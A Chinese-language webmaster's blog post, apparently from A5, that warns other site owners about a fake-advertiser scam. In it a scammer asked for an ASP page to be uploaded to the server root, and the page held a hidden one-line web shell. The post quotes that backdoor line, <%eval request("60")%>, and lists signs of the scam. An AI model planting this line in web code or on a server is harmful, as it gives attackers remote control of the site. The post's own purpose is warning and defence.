网上有被骗的实例,不想被我也撞上了!!
真没想到还有这样的骗子,竟然有骗子以广告为名来放病毒黑站!
今天QQ一个联系包月广告,他提供的的站是一个内容不多的音乐站(网站很可能不是他的,或许只是随便找了一个站吧)!
他要求在我的服务器上放一个他提供的网页,内容是连到他的网站!我看了一下他发来的网页ASP的,网页仅一个动画 ,然后自动转到的他的网页,也没在意,顺便把ASP后缀改成了HTM静态文件,然后传到了服务器,把网址发给他看效果!他提出要改成ASP文件,而且要放在根目录,此时感觉有点不太对,HTM和ASP效果完全一样吗?不过为了能让广告主满意,在FTP上把文件重命名为ASP后缀,把网址发给了他! 然后我顺便仔细看了一下这个网页的源文件,文件很小,打开我猛然发现了一句代码 <%eval request("60")%>,这不是那个一句话后门木马吗? 不对!!!!!我赶紧把这个ASP文件删除,同时发现首页多了一个可疑文件,来不及仔细看文件内容,立刻删除了!前后不到半分钟的时间! 此时骗子QQ开始问:我还没看,你怎么把文件拿掉了?
我故意装做不知道,把后门代码删除,重新传上!过了一会骗子说是再请示一下领导消失了!
其实,从一开始就感觉不太对头,骗子的技术虽然不高明,我相信这个方法足以骗过对程序不太了解或者没有足够提防心的的那些站长,看一下骗子的可疑之处:
1 、骗子提供的网站(广告目标站)很可能是随便网上找的一个站,仔细看该网站联系QQ和他的QQ不是一个;
2、骗子对广告价格不会和你进行太多的讨价还家,多少钱他都会做的;
3、当你想看看广告图片样式时,骗子会说广告图片还没做出来,然后要求你放一个他提供的页面在你的服务器上;
4、骗子提供的页面他一定会要求你必须以ASP结尾,静态的不行,我曾提出PHP可以不可以?(骗子的代码是针对ASP脚本来的,PHP也有一句话后门代码,提防);
5、同时骗子还多次提出让你把银行账号给他,他马上给你打钱,以此来拖延时间;
经历的整个过程仅几分钟,还好,骗子没得成!把这次的遭遇说出来,提醒广大站长以免上当,造成损失!
A5创业网 版权所有